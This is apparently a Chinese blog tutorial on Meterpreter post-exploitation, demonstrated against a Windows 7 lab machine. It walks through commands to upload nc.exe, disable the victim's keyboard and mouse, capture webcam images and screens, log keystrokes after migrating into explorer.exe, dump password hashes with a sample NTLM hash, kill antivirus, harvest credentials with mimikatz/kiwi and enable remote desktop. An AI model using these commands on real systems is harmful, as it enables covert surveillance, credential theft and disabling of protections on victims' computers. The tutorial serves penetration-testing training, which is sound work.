Metapreter 详细教程--进阶教程

常用命令

基本命令

命令 说明
sysinfo 查看系统信息
ls 列出目录或文件夹
pwd 获取当前目录地址
cd 切换目录,注意这里的win系统需要用用两个反斜杠来分割(cd c:\windows\system32 )
help 帮助
getuid 查看当前用户是谁
getpid 查看当前进程号
ps 查看所有进程
background 将当前会话放入后台运行
shell 获取一个交互式shell
sessions 列出当前可以用的会话列表同show sessions 一样
sessions -i <序号> 切换到指定序号的会话到前台来
quit 关闭meterpreter会话
irb 获取系统配置信息的结果

sysinfo 查看系统信息
Metapreter 详细教程--进阶教程_第1张图片
ls 列出当前目录
Metapreter 详细教程--进阶教程_第2张图片
pwd 显示当前位置地址
在这里插入图片描述
help 帮助
Metapreter 详细教程--进阶教程_第3张图片
getuid 查看当前用户
在这里插入图片描述
getpid 查看当前进程号
在这里插入图片描述
ps 查看当前所有进程
Metapreter 详细教程--进阶教程_第4张图片
background 将当前会话切换到后台运行
在这里插入图片描述
sessions 列出当前可以用的会话
Metapreter 详细教程--进阶教程_第5张图片
sessions -i 1 将选择的会话切换到前台来

Metapreter 详细教程--进阶教程_第6张图片
quit 退出
Metapreter 详细教程--进阶教程_第7张图片

文件系统命令

命令 说明
mkdir 创建文件夹
cat 查看文件内容
rmdir 删除文件夹
cp 复制文件
mv 移动文件或重命名文件
edit 编辑或创建文件
rm 删除文件
download <文件名称> 下载文件
upload <文件名称> 上传文件
ipconfig/ifconfig 查看网络配置
search -f <文件名称(支持通配符)> 搜索文件
以上命令前面加个 "l" 代表对本地系统进行操作

mkdir test 创建文件

Metapreter 详细教程--进阶教程_第8张图片
edit test/test.txt 创建文件或编辑文件

Metapreter 详细教程--进阶教程_第9张图片
cat test.txt 查看文件内容
在这里插入图片描述
cp test.txt test2.txt 文件复制

Metapreter 详细教程--进阶教程_第10张图片
rm test2.txt 删除文件

Metapreter 详细教程--进阶教程_第11张图片
search -f test* 搜索文件支持通配符
Metapreter 详细教程--进阶教程_第12张图片
download test.txt 下载文件
在这里插入图片描述
upload -r /tmp/nc.txt c:/test/nc.exe 上传文件
Metapreter 详细教程--进阶教程_第13张图片

用户控制和监视

命令 说明
uictl enable keyboard 启用键盘
uictl enable mouse 启用鼠标
uictl disable keyboard 禁用键盘
uictl disable mouse 禁用鼠标
webcam_list 查看摄像头
webcam_snap 通过摄像头拍照
webcam_stream 通过摄像头开启视频
run getgui -e 开启远程桌面
screenshot 抓屏
screenshare 实时监控桌面
keyscan_start 开启键盘记录
keyscan_dump 导出键盘记录
keyscan_stop 停止键盘记录
migrate 线程迁移

screenshot 抓屏
在这里插入图片描述
Metapreter 详细教程--进阶教程_第14张图片
screenshare 实时监控屏幕
Metapreter 详细教程--进阶教程_第15张图片

Metapreter 详细教程--进阶教程_第16张图片

键盘记录

在开启键盘记录的时候需要先确当当前的用户是谁,因为记录只会记录当前用用户

在这里插入图片描述

我们发现是system权限,但是我们要的权限是LivingOnHope的权限,这是我们需要切换到LivingOnHope的进程中去通过migrate 命令执行,这里我们选择explorer.exe进程,这个进程是windows的外壳程序(管理桌面的程序如果关闭桌面将啥也没有了)
migrate 2476
Metapreter 详细教程--进阶教程_第17张图片
Metapreter 详细教程--进阶教程_第18张图片
keyscan_start 开启键盘记录
keyscan_dump 下载记录内容
keyscan_stop 停止键盘记录

Metapreter 详细教程--进阶教程_第19张图片
Metapreter 详细教程--进阶教程_第20张图片

execute 执行文件命令

参数 说明
-h 帮助
-H 后台运行
-i 执行后与进程进行交流
-d 在目标主机执行时显示的进程名称(作为装用)
-m 直接从内存中运行
-a 执行命令需要的参数

execute -H -i -f cmd.exe

hashdump 获取密码HASH

windows的密码文件存放路径 C:\Windows\System32\config\SAM 密码存放在SAM文件中,在老的windows系统中用的是LM 加密方式 在新的系统中如win10win11等系统都是采用NTLM加密

Metapreter 详细教程--进阶教程_第21张图片

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
用户名称为:Administrator
RID为:500
LM-HASH值为:C8825DB10F2590EAAAD3B435B51404EE
NT-HASH值为:683020925C5D8569C23AA724774CE6CC

HASH解析网站

Metapreter 详细教程--进阶教程_第22张图片

run killav 关闭杀毒软件

run kilav 关闭杀毒软件(在关闭杀毒软件的同时也会关闭cmd,这个命令可能会造成系统死机的情况)

这里因为win7没有杀毒软件所有是found
Metapreter 详细教程--进阶教程_第23张图片

检测是否运行在虚拟机

run post/windows/gather/checkvm
在这里插入图片描述

枚举当前登录的用户

un post/windows/gather/enum_logged_on_users
Metapreter 详细教程--进阶教程_第24张图片

mimikatz和KiWi

在msf6中mimikatz已经被kiwi所取代了,必须是system来运行

load mimikatz 将mimikatz模块加入到metapreter中(因为mimikatz已经被kiwi所替代所有输入这个命令加载的也是kiwi)

load 加载模块
Metapreter 详细教程--进阶教程_第25张图片
Metapreter 详细教程--进阶教程_第26张图片
creds_all 获取所有凭证(在win7及其以下的版本是可以直接获取到当前登录人输入的登录口令的,win10及其以上的版本是不能直接获取到的,只能获取到HASH密码)
Metapreter 详细教程--进阶教程_第27张图片

开启远程桌面

run post/windows/manage/enable_rdp
Metapreter 详细教程--进阶教程_第28张图片
rdesktop 172.30.1.133

kali 中的一个远程桌面工具
Metapreter 详细教程--进阶教程_第29张图片

Metapreter 详细教程--进阶教程_第30张图片

你可能感兴趣的:(网络安全)